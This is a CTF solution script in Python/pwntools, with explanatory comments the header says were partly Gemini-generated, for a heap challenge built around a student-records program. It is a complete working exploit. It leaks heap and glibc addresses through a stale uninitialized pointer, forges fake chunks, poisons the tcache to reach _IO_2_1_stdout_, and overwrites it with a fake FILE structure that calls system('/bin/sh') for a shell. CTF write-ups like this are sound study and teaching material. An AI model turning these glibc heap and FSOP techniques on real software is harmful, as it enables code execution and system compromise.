# Comments within this script are partially generated by Gemini.
from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
context.timeout = 0.5

p = process('./chall_patched')
gdb.attach(p, '''
    continue
''')

# p = remote('chall.lac.tf', 31147)

def add_student(uid=None, name=b'X', major=b'X', aux=None, fill_student_info=True, add_aux_data=False):
    """
    [Operation: Add Student]
    The program allocates a `struct student` (requests 0x20 chunk). 
    A critical mechanism exists in how this chunk is initialized:
    if the 0x20 chunk is not retrieved from the top chunk,
    the program fails to initialize the `s->sinfo` pointer to NULL.
    It retains whatever residual data was left in that memory (such as a tcache bin or unsorted bin fd pointer).

    After the `struct student` allocation, the program asks whether to fill in the student information:

    - Skip initialization:
      The program skips the `fill_student_info` function entirely.
      The `struct student` is created, but its `s->sinfo` field is left untouched,
      preserving any residual pointers from the chunk's previously freed state.
      This is the exact mechanism used to stage the uninitialized pointer vulnerability.

    - Fill information:
      The program calls `fill_student_info()`, checking if `s->sinfo == NULL`:
        * If NULL, it cleanly allocates a `struct student_info` (requests 0x100 chunk)
          and subsequently allocates space for the `sinfo->name` (requests 0x110 chunk).
        * If NOT NULL (triggering our uninitialized pointer bug),
          it skips the 0x100 chunk allocation and reuses the residual pointer as the `struct student_info`.
          This grants a powerful primitive:
          we can overwrite the new `sinfo->name` pointer (a fresh allocated 0x110 chunk), along with `major`, `attributes`, and `aux` data,
          directly into the memory location pointed to by the leftover fd pointer, leading to overlapping chunks or arbitrary writes.
    """
    p.sendlineafter(b"Option > ", str(1).encode())
    p.sendlineafter(b"Enter student UID: ", str(uid).encode())
    if fill_student_info:
        p.sendlineafter(b"Enter student information now (y/n)? You can do it later: ", b'y')
        p.sendafter(b"Student name: ", name)
        p.sendafter(b"Student major: ", major)
        p.sendlineafter(b"Student attributes (e.g. undergrad = 1): ", b'1')
        if add_aux_data:
            p.sendlineafter(b"Require space to add aux data (y/n)? ", b'y')
            p.sendafter(b"Aux data: ", aux)
        else:
            p.sendlineafter(b"Require space to add aux data (y/n)? ", b'n')
    else:
        p.sendlineafter(b"Enter student information now (y/n)? You can do it later: ", b'n')

def get_student_info(uid):
    """
    [Operation: Get Student Info]
    The program looks up the student by UID and, if the `s->sinfo` pointer exists,
    prints out `sinfo->name`, `sinfo->major`, and `sinfo->attributes` using `printf`.

    Exploitation context for Leak:

    When a student is freed and reallocated without initialization,
    the `s->sinfo` pointer (located at offset 0x10 in the 0x20 chunk) remains completely intact.
    This is because the heap's `free` metadata (like the tcache `fd` and `key`) only overwrites the first 0x10 bytes.
    Thus, `s->sinfo` still points to the previously freed `struct student_info` (0x100) chunk.

    Furthermore, according to the `struct student_info` related source code,
    the author placed `char noeditingmyptrs[0x10]` at the very beginning.
    This means when the `struct student_info` chunk is freed,
    the tcache/unsorted bin metadata only corrupts this padding.
    The actual `sinfo->name` pointer, sitting safely at offset 0x10, survives.

    When `get_student_info` is called, it dereferences the stale `s->sinfo` pointer,
    follows the surviving `sinfo->name` pointer,
    and prints the data located inside the freed `sinfo->name` chunk (0x110 chunk):
    - If the `sinfo->name` chunk is in the tcache, its first 8 bytes contain a forward 
      pointer (`fd`), yielding a Heap Base leak.
    - If the `sinfo->name` chunk is placed in the unsorted bin, its first 8 bytes contain 
      a pointer back to the `main_arena`, yielding a Glibc Base leak.
    """
    p.sendlineafter(b"Option > ", str(2).encode())
    p.sendlineafter(b"Enter student UID: ", str(uid).encode())
    p.recvuntil(b"Student Name: ")
    return p.recvline().rstrip()

def remove_student(uid):
    """
    [Operation: Remove Student]
    The program locates the student by UID and frees their associated memory in a strict, sequential order:
    1. `free(sinfo->name)` -> Frees the 0x110 chunk.
    2. `free(sinfo)`       -> Frees the `struct student_info` (0x100 chunk).
    3. `free(ourUKLA[i])`  -> Frees the `struct student` (0x20 chunk).

    While the function correctly nullifies the global array pointer (`ourUKLA[i] = NULL;`) at the very end,
    it fails to clear the internal struct pointers before freeing them. 
    Specifically, it never does `sinfo->name = NULL` or `ourUKLA[i]->sinfo = NULL`. 
    Because these pointers are not zeroed out before `free()` is called,
    they remain as dangling pointers inside the freed memory chunks.
    This directly sets the stage for the uninitialized pointer vulnerability.
    """
    p.sendlineafter(b"Option > ", str(3).encode())
    p.sendlineafter(b"Enter student UID: ", str(uid).encode())

glibc_e = ELF('./libc.so.6')

# Stage 1: leak heap base address
"""
[Heap State Visualization: UAF & Stale Pointer (Tcache Bin Leak)]

1. add_student(0): Allocates student(0x20, heap_base_addr+0x12d0), sinfo(0x100, heap_base_addr+0x12f0), name(0x110, heap_base_addr+0x13f0).

2. remove_student(0): Frees them in LIFO order (name -> sinfo -> student).
   Because the struct padding absorbs the tcache metadata, the pointers survive.

   Tcache Bin:
    [ 0x20 chunk at heap_base_addr+0x12d0 ] -> [ next tcache chunk (null) ]
    +0x10: sinfo ptr
            |
            v
    [ 0x100 chunk at heap_base_addr+0x12f0 ] -> [ next tcache chunk (null) ]
    +0x10: name ptr
            |
            v
    [ 0x110 chunk at heap_base_addr+0x13f0 ] -> [ next tcache chunk (null) ]
    +0x00: fd (Safe-Linked Heap Address)

3. add_student(0, fill_student_info=False): Reallocates the 0x20 chunk at heap_base_addr+0x12d0
   Because we skip initialization, the `sinfo ptr` (heap_base_addr+0x12f0) remains intact.
   Calling get_student_info(0) follows the chain to the freed 0x110 chunk (heap_base_addr+0x13f0) and prints its `fd` pointer.
"""
add_student(0)
remove_student(0)
add_student(0, fill_student_info=False)
get_student_info(0)
heap_base_addr = (u64(get_student_info(0).ljust(8, b'\x00'))<<12)-0x1000
log.info(f"heap base address: {hex(heap_base_addr)}")

# Stage 2: forge fake chunks and leak glibc base address
"""
[Heap State Visualization: Fake Chunks Forgery]

By mapping the exact layout of Student 1's allocations, we can perfectly calculate where our payloads land on the heap:
- student chunk:      heap_base_addr+0x1500 (0x20 chunk)
- student_info chunk: heap_base_addr+0x12f0 (0x100 chunk)
- name chunk:         heap_base_addr+0x13f0 (0x110 chunk)

While allocating Student 1, we deliberately embed fake chunk headers and pointers inside the `name` and `aux` buffers.
This is NOT for leaking libc, but to set up a fully controllable chain of fake heap layout for later exploit.

1. Inside 'name' buffer (heap_base_addr+0x13f0):
   +0x30 (0x1420): Fake `student` chunk starts here
   +0x40 (0x1430): Fake `sinfo` ptr -> points to heap_base_addr+0x1360

2. Inside 'aux' buffer (heap_base_addr+0x1350):
   +0x00 (0x1350): 0x0   (Fake `sinfo` prev_size)
   +0x08 (0x1358): 0x21  (Fake `sinfo` chunk size)
   +0x10 (0x1360): Fake `sinfo` chunk starts here
   +0x20 (0x1370): Fake `name` ptr -> points to heap_base_addr+0x13d0
   +0x70 (0x13c0): 0x0   (Fake `name` prev_size)
   +0x78 (0x13c8): 0x111 (Fake `name` chunk size)
   +0x80 (0x13d0): Fake `name` chunk starts here

Later, the uninitialized pointer mechanism will trick the program into using these fake structures.
"""
add_student(1,
            b'A'*0x40+p64(heap_base_addr+0x1360)+b'A'*0x18+p64(0)+b'A'*0x98,
            b'B'*0x40,
            p64(0)+p64(0x21)+b'C'*0x10+p64(heap_base_addr+0x13d0)+b'C'*0x48+p64(0)+p64(0x111)+b'C'*0x10,
            add_aux_data=True)
"""
[Heap State Visualization: UAF & Stale Pointer (Unsorted Bin Leak)]

To leak glibc, we need a 0x110 chunk to enter the Unsorted Bin (which writes a main_arena pointer into the chunk's fd).

1. Fill the 0x110 tcache: Add and free 8 dummy students (students 1-8).

2. Unsorted Bin Drop: While freeing an 8th student (Student 1), since the tcache is full,
   Student 1's `name` chunk (0x110, heap_base_addr+0x13f0) bypasses tcache and drops into the Unsorted Bin,
   Student 1's `sinfo` chunk (0x100, heap_base_addr+0x12f0) bypasses tcache and drops into the Unsorted Bin,
   (unlink/consolodation happens, we now have a single, massive 0x210 freed chunk sitting in the Unsorted Bin, starting at `heap_base_addr+0x12f0`),
   Student 1's chunk (0x20, heap_base_addr+0x1500) bypasses tcache and drops into the Fast Bin.

3. Clear the 0x20 and 0x110 tcache: Reallocate 7 dummy students.

4. Leak: Allocate Student 8 with `fill_student_info=False`.
   It inherits Student 1's freed 0x20 chunk (heap_base_addr+0x500).
   While calling `get_student_info(8)` to print the main_arena leak,
   The stale pointers trace back to the Student 1's `name` chunk (heap_base_addr+0x13f0),
   which is now part of the consolidated unsorted bin chunk containing the `main_arena` leak.
"""
for i in range(7):
    add_student(i+2)
for i in range(8):
    remove_student(8-i)
for i in range(7):
    add_student(7-i)
add_student(8, fill_student_info=False)
glibc_base_addr = u64(get_student_info(8).ljust(8, b'\x00'))-0x1e6c20
log.info(f"glibc base address: {hex(glibc_base_addr)}")

# Stage 3: heap feng shui to tcache poisoning for fsop
"""
[Heap State Visualization: Overlapping Chunks & Tcache Poisoning]

Now we weaponize the fake chain that are resting inside the consolidated Unsorted Bin chunk (heap_base_addr+0x12f0).
We need to trick the program into freeing our forged `0x110` chunk (heap_base_addr+0x13d0) into the tcache,
and then reallocate it with a crafted payload to poison the tcache `fd` pointer of another freed `0x110` chunk (heap_base_addr+0x13f0).

1. Prepare Stale Pointers:

   - add_student(9):
     * student (heap_base_addr+0x12f0, newly allocated 0x20 from Unsorted Bin)
     * sinfo (heap_base_addr+0x13f0, residual 0x110)
     * name (heap_base_addr+0x1310, newly allocated 0x110 from Unsorted Bin)

   - remove_student(9): Frees them in LIFO order (name -> sinfo -> student).
     Tcache Bin:
      [ 0x20 chunk at heap_base_addr+0x12f0 ] -> [ next tcache chunk (null) ]
      +0x10: sinfo ptr 
              |
              ---------------------------------------------
                                                          |
                                                          v
      [ 0x110 chunk at heap_base_addr+0x13f0 ] -> [ 0x110 chunk at heap_base_addr+0x1310 ] -> [ next tcache chunk (null) ]
              ^                                   +0x10: name ptr
              |                                           |
              ---------------------------------------------

   - add_student(9, fill_student_info=False): Clears the 0x20 tcache.

2. Free the Fake Chunk:

   - add_student(10, fill_student_info=False):
     Picks up a 0x20 chunk whose stale `sinfo` chain leads directly to the fake `name` chunk (Size 0x110) we forged earlier.
     * student (heap_base_addr+0x1420, newly allocated 0x20 from Unsorted Bin)
     * sinfo (heap_base_addr+0x1360, forged 0x20)
     * name (heap_base_addr+0x13d0, forged 0x110)

   - remove_student(10): Executes `free(sinfo->name)`.
     Because the stale pointer points to our fake chunk, glibc frees our fake `0x110` chunk into the 0x110 tcache!
     Tcache Bin (0x110):
      [ Fake 0x110 chunk at heap_base_addr+0x13d0 ] -> [ 0x110 chunk at heap_base_addr+0x13f0 ] -> [ 0x110 chunk at heap_base_addr+0x1310 ] -> [ next tcache chunk (null) ]

3. Poison the FD Pointer:

   - add_student(10, name=payload):
     Perform an allocation of the `name` chunk that
     overlaps from [Fake 0x110 chunk at heap_base_addr+0x13d0] to [ 0x110 chunk at heap_base_addr+0x13f0 ]
     * student (heap_base_addr+0x1420, newly allocated 0x20 from Tcache Bin)
     * sinfo (heap_base_addr+0x1360, residual forged 0x20)
     * name (heap_base_addr+0x13d0, newly allocated forged 0x110)
     We overwrite the `fd` pointer of 0x110 chunk at heap_base_addr+0x13f0 with the XORed address of `_IO_2_1_stdout_`.
     Tcache Bin (0x110):
      [ 0x110 chunk at heap_base_addr+0x13f0 ] -> [ _IO_2_1_stdout_ ] -> [ corrupted ]

4. Advance the Tcache:

   - add_student(11): Allocates a dummy 0x110 chunk at heap_base_addr+0x13f0.
     Tcache Bin (0x110):
      [ _IO_2_1_stdout_ ] -> [ corrupted ]

5. Trigger the FSOP:

    - add_student(12, name=payload): Sends the fake FILE structure as the `name` buffer to overwrite the `_IO_2_1_stdout_` structure in memory.
"""
add_student(9)
remove_student(9)
add_student(9, fill_student_info=False)
add_student(10, fill_student_info=False)
remove_student(10)
add_student(10, b'D'*0x10+p64(0)+p64(0x111)+p64(((heap_base_addr+0x13f0)>>12)^(glibc_base_addr+glibc_e.symbols['_IO_2_1_stdout_'])))
add_student(11)
fake_file = FileStructure(0)
fake_file.flags = 0x3b01010101010101
fake_file._IO_read_end = glibc_base_addr+glibc_e.sym.system
fake_file._IO_buf_base = u64(b'/bin/sh\x00')
fake_file._IO_backup_base = glibc_base_addr+next(glibc_e.search(asm('add rdi, 0x10; jmp rcx;')))
fake_file._lock = glibc_base_addr+0x1e87b0
fake_file._codecvt = glibc_base_addr+glibc_e.symbols['_IO_2_1_stdout_']+0xb8
fake_file._wide_data = glibc_base_addr+glibc_e.symbols['_IO_2_1_stdout_']+0x200
fake_file.unknown2 = p64(0)*2+p64(glibc_base_addr+glibc_e.symbols['_IO_2_1_stdout_']+0x28)+p64(0)*3
fake_file.vtable = glibc_base_addr+glibc_e.symbols['_IO_wfile_jumps']-0x18
add_student(12, bytes(fake_file))

p.interactive()

# lactf{w0w_y0u_s0lv3d_m3_heap_heap_hurray}